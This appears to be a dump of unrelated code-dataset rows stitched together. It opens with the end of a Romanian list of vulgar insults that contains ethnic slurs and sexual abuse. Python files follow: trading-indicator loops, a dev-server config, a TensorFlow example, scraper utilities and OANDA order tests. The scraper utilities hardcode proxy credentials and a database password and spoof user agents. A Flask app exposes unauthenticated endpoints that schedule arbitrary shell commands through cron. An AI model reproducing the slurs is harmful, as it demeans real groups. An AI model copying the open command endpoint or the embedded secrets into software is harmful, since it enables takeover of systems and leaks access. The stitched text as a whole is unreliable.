'pai daten mm de pizda proasta, pui ss cu samsung health la instastory si ne arati cati pasi ai facut tu de la shaormerie pana acasa sau din pat pana la frigider, si te lauzi ca faci sport? sport e cand o sugi si nuti oboseste gura.',
'sa o fut pe mata in gura pana ii perforez laringele',
'Cum sati fie frica de fantome gen scubi dubi du unde esti tu',
'cand ti am aratat prima oara narghileaua ai crezut ca e pompa si ai scos mingea so umflam pt diseara la fotbal',
'ce nas ai zici ca e racheta lu Trump cu care bombardeaza Siria',
'daca esti scunda si folosesti expresia "sunt mai aproape de iad", nu daten mortii mati esti mai aproape sa-mi faci masaj la prostata cu gura din picioare',
'BAGAMIAS PULAN MORTI TAI DITULE AI CORPU ALA ZICI CAI AMBALAJ DE LA IKEA',
'cum sa nu sti nimic despre masini gen am creieru tdi cu motor de 6 mii ))))))',
'sa vedeti cioroilor, azi dimineata stateam linistit in pat si il gadilam pe fratimio in talpa, la care mama "macar asteapta pana se naste", gen cplm nu pot sa ma joc cu el',
'pray pt toti cioroi care lea fost inima ranita de puicute stei strong barbati mei',
'Ho nebunule ca groapa marianelor si mata sunt cele mai adanci puncte de pe planeta',
'te dai mare diva figuri de buftea cu iph 6 da daca conectez castile la buricu tau se aude balada foamei bass boosted',
'cum pulamea sa nadormi vere gen noapte buna somn usor sapte purici pun picior',
'comentezi de bataie dar te sponsorizeaza croco cu corpu ala fmm de stick',
'buna ziua muie la bozgori si o seara cat mai linistita sa aveti oameni buni',
'Baganeam pula în profii de matematică o vezi pe Ionela ca are curu mare și îi pui 8 fututen gura si mie 5 luates in pula cu chelia ta',
'MAMA TA E ASA DE GRASA INCAT THANOS A BATUT DE 2 ORI DIN DEGETE SA O STEARGA DE PE PLANETA',
'esti frumoasa andreea da fara machiaj te striga lumea andrei pe strada',
'te dai mare smecher ca ai bani tu da dormi cu fratii tai pe rand in soba ca e frig afara pisa m as pe tn de sarantoc',
'vezi sa nu cazi in pumn baiatul meu ca poate te omori',
'Sa te fut in gura mort ca viu dai din picioare',
'Coaie te lauzi ca esti orasean ai vazut tranvaiu ai zis ca a fatat trenu copilu matii',
'ESTI ATAT DE URAT INCAT ATUNCI CAND PLANGI LACRIMILE SE INTALNESC LA CEAFA SA ITI OCOLEASCA FATA',
'Te dai mare culturist gen coaie ce spate am rup da sati scuipe unchiu Fester in ciorba mati de nu esti mai cocosat decat Rammus din lol in morti tai de ghertoi mars inapoi in papusoi',
'ma-ta aia curva cand imi vede pula zice "My precious" ca Gollum futu-ti rasa si neamu ma-tii de mamaligar',
'daca esti profesor si in timpul unei lucrari muti colegu ala mai bun din banca astfel incat ala mai prost sa nu poata copia meriti sa se prabuseasca pe tn si pe mata toate pulele pe care le a supt fieta sasi ia jordani la 3 milioane de pe olx',
'cand te am dus prima oara la pull&bear m ai intrebat unde i ursu',
'puneti poze cu bani pistoale si adidasi de la zanotti si valentino dar voi intrati in foame daca va scoate oferta de 5 lei combo de la mec',
'fmm ca te au dus astia la restaurant ca ai comandat ciorba si mancai cu furculita',
'am o dilema coaie, daca sperma are doar 7 calorii mata dc e obeza',
'Coaie ce prosti sunt straini cum plm sati dai 500-1000 eur pe un tricou guci cand in romania sunt la 10 sute 3 bucati ))))',
'Te lauzi ca tu ai geaca monclăr daia scumpa si nu ai ca saraci tai de colegi de la pull and bear dar ai uitat ca anu trecut venei cu hanorac de la decathlon cu pelerina de ploaie fmm de nemancata',
'cand te-am dus prima data la orange m-ai intrebat unde-s portocalele fmm de agricultor',
'cand ti am aratat prima oara o shaorma ai zis ca de ce mananc clatite cu carne si cartofi',
'Te dai mare gigolo dar ti se scoala pula cand se apleaca ma-ta',
'ia st ma sami pun la instastory o poza cu bautura gen sa vada urmaritori mei ca ma respect beau vin la 9,5 lei ca pana atunci singurul alcol care lai gustat a fost tuica de la pomana cand sa imbatat mata de ai duso cu roaba acasa luavas in pula mari smecheri ca puneti 5 inji 10 sute sa beti bohoarca',
'Am facut o lista cu aia cu care nu sa futut mata:',
'dai check-in zi de zi la cinema pui descriere "Another day another movie" da sa moara Toni Montana daca te mint ca acasa inca mai ai antena lu tactu mare de la tara si prinzi 5 canale de tvr 1 in 5 stiluri diferite',
'te dai mare gamerita esti tot cu #pcmasterrace dar cand mai vazut ca ma joc fifa mai intrebat unde a disparut digisport de sus din colt a dracu ascilopata',
'usor cu atitudinea de babygirl pe net ca in realitate ai trezit krakenu cu ragaitu ala posedato',
'coaie cum sa nu sti cum sa ai grija de o tarantula gen lol pela coaie pela pula'
]
| 91.775641 | 1,661 | 0.777607 |
3a8f0982e03b38e05aa03eb45840308eeb8e3dc5 | 3,730 | py | Python | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | 7 | 2021-01-31T19:23:07.000Z | 2022-03-10T21:22:41.000Z | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | null | null | null | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | null | null | null | import numpy as np
from numba import jit
@jit
def wilders_loop(data, n):
"""
Wilder's Moving Average Helper Loop
Jit used to improve performance
"""
for i in range(n, len(data)):
data[i] = (data[i-1] * (n-1) + data[i]) / n
return data
@jit
def kama_loop(data, sc, n_er, length):
"""
Kaufman's Adaptive Moving Average Helper Loop
Jit used to improve performance
"""
kama = np.full(length, np.nan)
kama[n_er-1] = data[n_er-1]
for i in range(n_er, length):
kama[i] = kama[i-1] + sc[i] * (data[i] - kama[i-1])
return kama
@jit
def psar_loop(psar, high, low, af_step, max_af):
"""
Wilder's Parabolic Stop and Reversal Helper Loop
Jit used to improve performance
"""
length = len(psar)
uptrend = True
af = af_step
high_point = high[0]
low_point = low[0]
psar_up = np.empty(length)
psar_up.fill(np.nan)
psar_down = np.empty(length)
psar_down.fill(np.nan)
for i in range(2, length):
reversal = False
if uptrend:
psar[i] = psar[i-1] + af * (high_point - psar[i-1])
if low[i] < psar[i]:
reversal = True
psar[i] = high_point
low_point = low[i]
af = af_step
else:
if high[i] > high_point:
high_point = high[i]
af = min(af + af_step, max_af)
if low[i-2] < psar[i]:
psar[i] = low[i-2]
elif low[i-1] < psar[i]:
psar[i] = low[i-1]
else:
psar[i] = psar[i-1] - af * (psar[i-1] - low_point)
if high[i] > psar[i]:
reversal = True
psar[i] = low_point
high_point = high[i]
af = af_step
else:
if low[i] < low_point:
low_point = low[i]
af = min(af + af_step, max_af)
if high[i-2] > psar[i]:
psar[i] = high[i-2]
elif high[i-1] > psar[i]:
psar[i] = high[i-1]
uptrend = uptrend ^ reversal
if uptrend:
psar_up[i] = psar[i]
else:
psar_down[i] = psar[i]
return psar
@jit
def supertrend_loop(close, basic_ub, basic_lb, n):
"""
Supertrend Helper Loop
Jit used to improve performance
"""
length = len(close)
final_ub = np.zeros(length)
final_lb = np.zeros(length)
supertrend = np.zeros(length)
for i in range(n, length):
if basic_ub[i] < final_ub[i-1] or close[i-1] > final_ub[i-1]:
final_ub[i] = basic_ub[i]
else:
final_ub[i] = final_ub[i-1]
if basic_lb[i] > final_lb[i-1] or close[i-1] < final_lb[i-1]:
final_lb[i] = basic_lb[i]
else:
final_lb[i] = final_lb[i-1]
if supertrend[i-1] == final_ub[i-1] and close[i] <= final_ub[i]:
supertrend[i] = final_ub[i]
elif supertrend[i-1] == final_ub[i-1] and close[i] > final_ub[i]:
supertrend[i] = final_lb[i]
elif supertrend[i-1] == final_lb[i-1] and close[i] >= final_lb[i]:
supertrend[i] = final_lb[i]
elif supertrend[i-1] == final_lb[i-1] and close[i] < final_lb[i]:
supertrend[i] = final_ub[i]
else:
supertrend[i] = 0.00
return supertrend
@jit
def fib_loop(n):
"""
Fibonacci loop
Returns the fibonacci sequence as a list from the 3rd to the n-1th number
Jit used to improve performance
"""
fib = [0, 1]
[fib.append(fib[-2] + fib[-1]) for i in range(n-1)]
return fib[3:]
| 24.866667 | 77 | 0.507507 |
3a8feafe3391c0ddd2f78fb39a9371d4374c0a73 | 1,441 | py | Python | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | # Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import netlog_viewer_project
import webapp2
from webapp2 import Route
def _RelPathToUnixPath(p):
return p.replace(os.sep, '/')
class TestListHandler(webapp2.RequestHandler):
def get(self, *args, **kwargs): # pylint: disable=unused-argument
project = netlog_viewer_project.NetlogViewerProject()
test_relpaths = ['/' + _RelPathToUnixPath(x)
for x in project.FindAllTestModuleRelPaths()]
tests = {'test_relpaths': test_relpaths}
tests_as_json = json.dumps(tests)
self.response.content_type = 'application/json'
return self.response.write(tests_as_json)
class NetlogViewerDevServerConfig(object):
def __init__(self):
self.project = netlog_viewer_project.NetlogViewerProject()
def GetName(self):
return 'netlog_viewer'
def GetRunUnitTestsUrl(self):
return '/netlog_viewer/tests.html'
def AddOptionstToArgParseGroup(self, g):
pass
def GetRoutes(self, args): # pylint: disable=unused-argument
return [
Route('/netlog_viewer/tests', TestListHandler),
]
def GetSourcePaths(self, args): # pylint: disable=unused-argument
return list(self.project.source_paths)
def GetTestDataPaths(self, args): # pylint: disable=unused-argument
return []
| 26.2 | 72 | 0.727967 |
3a9084ba87c0f5c49b0d1b1f5827e460b297b88e | 3,991 | py | Python | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | 3 | 2021-05-10T13:42:59.000Z | 2022-03-28T02:07:23.000Z | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | null | null | null | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | 4 | 2018-05-12T13:43:00.000Z | 2021-10-30T01:23:00.000Z | # -*- coding: utf-8 -*-
import json
import os
from crontab import CronTab
from flask import Flask, request
from pathlib import Path
from pretty_cron import prettify_cron
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
return Path(app.root_path + '/index.html').read_text()
@app.route('/create', methods=['POST'])
def create():
pattern = request.form['pattern']
command = request.form['command']
if not command or prettify_cron(pattern) == pattern:
return json.dumps({
'status': 'fail',
'message': 'Some arguments are invalid.'
})
cron = CronTab(user=os.getenv('USER'))
job_id = len(cron)
job = cron.new(command=command)
job.setall(pattern)
cron.write()
return json.dumps({
'status': 'ok',
'message': 'Job successfully created.',
'job': {
'id': job_id,
'pattern': pattern,
'command': command,
'description': prettify_cron(pattern)
}
})
@app.route('/retrieve', methods=['GET'], defaults={'job_id': -1})
@app.route('/retrieve/id/<int:job_id>', methods=['GET'])
def retrieve(job_id):
jobs = []
cron = CronTab(user=os.getenv('USER'))
if job_id < 0:
for i, job in enumerate(cron):
pattern = job.slices.render()
command = job.command
description = prettify_cron(pattern)
jobs.append({
'id': i,
'pattern': pattern,
'command': command,
'description': description
})
return json.dumps({
'status': 'ok',
'message': 'Jobs retrieved successfully',
'jobs' : jobs
})
elif job_id < len(cron):
job = cron[job_id]
pattern = job.slices.render()
command = job.command
description = prettify_cron(pattern)
return json.dumps({
'status': 'ok',
'message': 'Job retrieved successfully',
'jobs' : [{
'id': job_id,
'pattern': pattern,
'command': command,
'description': description
}]
})
return json.dumps({
'status': 'fail',
'message': 'Job ID is invalid.'
})
@app.route('/update/id/<int:job_id>', methods=['POST'])
def update(job_id):
pattern = request.form['pattern'] if 'pattern' in request.form else None
command = request.form['command'] if 'command' in request.form else None
description = ''
if not command and prettify_cron(pattern) == pattern:
return json.dumps({
'status': 'fail',
'message': 'Some argument must be provided.'
})
cron = CronTab(user=os.getenv('USER'))
if job_id >= len(cron) or job_id < 0:
return json.dumps({
'status': 'fail',
'message': 'Job ID is invalid.'
})
if not command:
command = cron[job_id].command
cron[job_id].set_command(command)
if pattern and prettify_cron(pattern) != pattern:
cron[job_id].setall(pattern)
description = prettify_cron(pattern)
else:
pattern = cron[job_id].slices.render()
cron.write()
return json.dumps({
'status': 'ok',
'message': 'Job updated successfully.',
'job': {
'id': job_id,
'pattern': pattern,
'command': command,
'description': description
}
})
@app.route('/delete/id/<int:job_id>', methods=['DELETE'])
def delete(job_id):
cron = CronTab(user=os.getenv('USER'))
if job_id >= len(cron) or job_id < 0:
return json.dumps({
'status': 'fail',
'message': 'Job ID is invalid.'
})
cron.remove(cron[job_id])
cron.write()
return json.dumps({
'status': 'ok',
'message': 'Job deleted successfully.'
})
if __name__ == '__main__':
app.run()
| 26.256579 | 76 | 0.540466 |
3a90d1f158c36003df58478dbdda2afff682b6b2 | 1,196 | py | Python | 2017/examples/05_randomization.py | limunan/stanford-tensorflow-tutorials | 51e53daaa2a32cfe7a1966f060b28dbbd081791c | [
"MIT"
] | 9,180 | 2017-07-27T23:43:41.000Z | 2022-03-29T17:10:14.000Z | 2017/examples/05_randomization.py | Nianze/stanford-tensorflow-tutorials | 51e53daaa2a32cfe7a1966f060b28dbbd081791c | [
"MIT"
] | 86 | 2017-08-04T12:38:38.000Z | 2020-12-09T03:34:02.000Z | 2017/examples/05_randomization.py | joshosu/stanford-tensorflow-tutorials | b16899102bf07964a15494452a2e91c1b9f88e46 | [
"MIT"
] | 4,115 | 2017-07-28T06:53:12.000Z | 2022-03-23T12:36:55.000Z | """ Examples to demonstrate ops level randomization
Author: Chip Huyen
Prepared for the class CS 20SI: "TensorFlow for Deep Learning Research"
cs20si.stanford.edu
"""
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
# Example 1: session is the thing that keeps track of random state
c = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
print(sess.run(c)) # >> -5.97319
# Example 2: each new session will start the random state all over again.
c = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
# Example 3: with operation level random seed, each op keeps its own seed.
c = tf.random_uniform([], -10, 10, seed=2)
d = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
print(sess.run(d)) # >> 3.57493
# Example 4: graph level random seed
tf.set_random_seed(2)
c = tf.random_uniform([], -10, 10)
d = tf.random_uniform([], -10, 10)
with tf.Session() as sess:
print(sess.run(c)) # >> 9.12393
print(sess.run(d)) # >> -4.53404
| 27.813953 | 74 | 0.664716 |
3a91c8f71ed1bbfb503d86a5235097fd88dfae4a | 5,651 | py | Python | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | wangchuanli001/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 12 | 2019-12-07T01:44:55.000Z | 2022-01-27T14:13:30.000Z | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 23 | 2020-05-23T03:56:33.000Z | 2022-02-28T07:54:45.000Z | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 7 | 2019-12-20T04:48:56.000Z | 2021-11-19T02:23:45.000Z | # -*- coding: utf-8 -*-
'''
通用工具类
'''
import time
import MySQLdb
import jieba
import ast
import random, sys
# 日志类
import requests
sys.setrecursionlimit(1000000)
class Logger(object):
def __init__(self, filename='default.log', stream=sys.stdout):
self.terminal = stream
self.log = open(filename, 'a', encoding='utf-8')
# def print(self, message):
# self.terminal.write(message + "\n")
# self.log.write(message.encode('utf-8') + b"\n")
# def flush(self):
# self.terminal.flush()
# self.log.flush()
# def close(self):
# self.log.close()
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
pass
# 获得本地文件代理
def getproxyip(ip_file):
fo = open(ip_file, 'r', encoding='utf-8')
proxys = fo.read().split('\n')
proxy = ast.literal_eval(random.choice(proxys))
# print(proxy)
fo.close()
return proxy
# 随机请求头
def randomheader():
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; WOW64)", 'Mozilla/5.0 (Windows NT 6.3; WOW64)',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;\
.NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; rv:11.0) like Gecko)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3',
'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070803 Firefox/1.5.0.12',
'Opera/9.27 (Windows NT 5.2; U; zh-cn)',
'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.0',
'Opera/8.0 (Macintosh; PPC Mac OS X; U; en)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727;\
.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.6.2000\
Chrome/26.0.1410.43 Safari/537.1 ',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2;\
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\
Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; QQBrowser/7.3.9825.400)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 ',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) \
Chrome/21.0.1180.92 Safari/537.1 LBBROWSER',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BIDUBrowser 2.x)',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) \
Chrome/20.0.1132.11 TaoBrowser/3.0 Safari/536.11'
]
user_agent = random.choice(user_agents)
headers = {
'User-Agent': user_agent,
'Connection': 'close',
}
return headers
'''
58.218.205.40:7754
221.229.196.234:6987
58.218.205.51:7038
58.218.205.57:2513
58.218.205.55:7817
58.218.205.52:5109
'''
# ip代理设置列表
ip_port = ["180.97.250.157:5147", "58.218.205.39:7893", "180.97.250.158:4107", "221.229.196.212:9311",
"221.229.196.212:6066", "221.229.196.192:6545",
"221.229.196.231:9975", "221.229.196.212:4953", "221.229.196.192:2133"]
# 代理服务器 阿布云
proxyHost = "http-dyn.abuyun.com"
proxyPort = "9020"
# 代理隧道验证信息
proxyUser = "HP48W550C1X873PD"
proxyPass = "FED1B0BB31CE94A3"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
# 爬虫
def spider(url, times=0):
try:
proxies = {
"http": proxyMeta,
"https": proxyMeta,
}
# proxies = {
# "https": random.choices(port_list)[0]
# }
requests.packages.urllib3.disable_warnings()
# response = requests.get(url, headers=randomheader(), proxies=proxies, timeout=20, verify=False) # 使用代理ip
response = requests.get(url, headers=randomheader(), timeout=20, verify=False)# 不使用代理ip
requests.adapters.DEFAULT_RETRIES = 5
s = requests.session()
s.keep_alive = False
return response
except Exception as e:
times += 1
print("爬虫异常:" + url + "原因-:" + str(e))
if times > 6:
return ""
time.sleep(random.randint(0, 9))
print("重新爬取:" + str(times) + "===" + url)
spider(url, times)
# 数据库更新语句执行操作
def sql_opt(databse, sql):
db = MySQLdb.connect("localhost", "root", "123456789", databse, charset='utf8')
cursor = db.cursor()
try:
cursor.execute(sql)
db.commit()
except Exception as e:
print("sql_opt语句执行异常" + str(e) + "\n" + sql)
db.rollback()
db.close()
if __name__ == '__main__':
print("test")
fo = open("proxy_ip.txt", 'r', encoding='utf-8')
port_list = fo.read().split("\n")
fo.close()
proxies = {
"https": random.choices(port_list)[0],
}
print(proxies)
| 33.838323 | 121 | 0.599186 |
3a92948a079a2d3f3db1feb98db4697c887b4594 | 140 | py | Python | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
from numpy import*
n, *a = map(int, open(0).read().split())
a = array(a)
print(int(min(abs(cumsum(a)-(sum(a)/2)))*2)) | 28 | 44 | 0.621429 |
3a948fad21b8a67c7efb20bb30784138fb309c60 | 11,836 | py | Python | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 389 | 2016-07-22T17:19:17.000Z | 2022-03-18T21:14:55.000Z | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 162 | 2016-10-04T18:17:48.000Z | 2021-12-22T10:53:54.000Z | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 120 | 2016-08-08T18:52:41.000Z | 2022-03-24T06:53:38.000Z | import unittest
try:
from nose_parameterized import parameterized
except:
print("*** Please install 'nose_parameterized' to run these tests ***")
exit(0)
import oandapyV20.contrib.requests as req
import oandapyV20.definitions.orders as OD
import oandapyV20.types as types
class TestContribRequests(unittest.TestCase):
"""Tests regarding contrib requests.
The reference is created using the second dict parameter. The
first dict parameter is merge with this, but only for the keys
that do NOT exist. That allows us to override parameters.
The result should reflect the data constructed by the class
"""
@parameterized.expand([
# MO
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
"units": 10000}, # integer!
{'timeInForce': 'FOK', # the default
'units': '10000', # override, should be the str equiv.
'positionFill': 'DEFAULT',
'type': 'MARKET'}
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
"priceBound": 12345, # integer
"units": "10000"},
{'timeInForce': 'FOK',
"priceBound": types.PriceValue(12345).value,
'positionFill': 'DEFAULT',
'type': 'MARKET'}
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GFD', # should result in a ValueError
"units": "10000"},
{'positionFill': 'DEFAULT',
'type': 'MARKET'},
ValueError
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'FOK',
'positionFill': 'WRONG',
"units": "10000"},
{'positionFill': 'WRONG',
'type': 'MARKET'},
ValueError
),
# LO
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
"units": 10000, # integer
"price": 1.08},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'
}
),
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
"units": "10000", # string
"price": "1.08"},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'
}
),
# ... GTD, should raise a ValueError with missing date
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GTD',
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTD',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'},
ValueError
),
# MIT
(req.MITOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'}
),
# ... GTD, should raise a ValueError with missing date
(req.MITOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GTD',
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTD',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.MITOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'FOK',
"units": 10000,
"price": 1.08},
{'timeInForce': 'FOK',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'},
ValueError
),
# TPO
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"price": 1.22},
{'timeInForce': 'GTC',
"price": '1.22000',
'type': 'TAKE_PROFIT'}
),
# ... GTD, should raise a ValueError with missing date
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"price": 1.22},
{'timeInForce': 'GTD',
"price": '1.22000',
'type': 'TAKE_PROFIT'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"price": 1.22},
{'timeInForce': 'FOK',
"price": '1.22000',
'type': 'TAKE_PROFIT'},
ValueError
),
# SLO
(req.StopLossOrderRequest,
{"tradeID": "1234",
"price": 1.07},
{'timeInForce': 'GTC',
'type': 'STOP_LOSS',
'price': '1.07000'}
),
# ... GTD, should raise a ValueError with missing date
(req.StopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"price": 1.07},
{'timeInForce': 'GTD',
'type': 'STOP_LOSS'},
ValueError
),
# ... FOK, should raise a ValueError
(req.StopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"price": 1.07},
{'timeInForce': 'FOK',
'type': 'STOP_LOSS'},
ValueError
),
# TSLO
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"distance": 20.5},
{'timeInForce': 'GTC',
"distance": '20.50000',
'type': 'TRAILING_STOP_LOSS'}
),
# ... GTD, should raise a ValueError with missing date
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"distance": 20.5},
{'timeInForce': 'GTD',
'type': 'TRAILING_STOP_LOSS'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"distance": 20.5},
{'timeInForce': 'FOK',
"distance": "20.50000",
'type': 'TRAILING_STOP_LOSS'},
ValueError
),
# SO
(req.StopOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"price": 1.07},
{'timeInForce': 'GTC',
'positionFill': 'DEFAULT',
"price": "1.07000",
'type': 'STOP'}
),
# ... GTD, should raise a ValueError with missing date
(req.StopOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"timeInForce": "GTD",
"price": 1.07},
{'timeInForce': 'GTD',
'positionFill': 'DEFAULT',
"price": "1.07000",
'type': 'STOP'},
ValueError
),
])
def test__orders(self, cls, inpar, refpar, exc=None):
reference = dict({"order": refpar})
# update in reference all keys if they do not exists
for k in inpar.keys():
if k not in reference['order']:
reference['order'][k] = str(inpar[k])
if not exc:
r = cls(**inpar)
self.assertTrue(r.data == reference)
else:
with self.assertRaises(exc):
r = cls(**inpar)
@parameterized.expand([
# regular
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000},
{"longUnits": "10000",
"shortUnits": "2000"},
),
# nothing
(req.PositionCloseRequest,
{},
{},
ValueError
),
# client ext
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000,
"longClientExtensions": {"key": "val"}
},
{"longUnits": "10000",
"shortUnits": "2000",
"longClientExtensions": {"key": "val"}
},
),
# client ext
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000,
"shortClientExtensions": {"key": "val"}
},
{"longUnits": "10000",
"shortUnits": "2000",
"shortClientExtensions": {"key": "val"}
},
),
# regular
(req.TradeCloseRequest,
{"units": 10000},
{"units": "10000"}
),
# default
(req.TradeCloseRequest,
{},
{"units": "ALL"}
),
# TakeProfitDetails
(req.TakeProfitDetails,
{"price": 1.10},
{'timeInForce': 'GTC',
'price': '1.10000'}
),
# .. raises ValueError because GTD required gtdTime
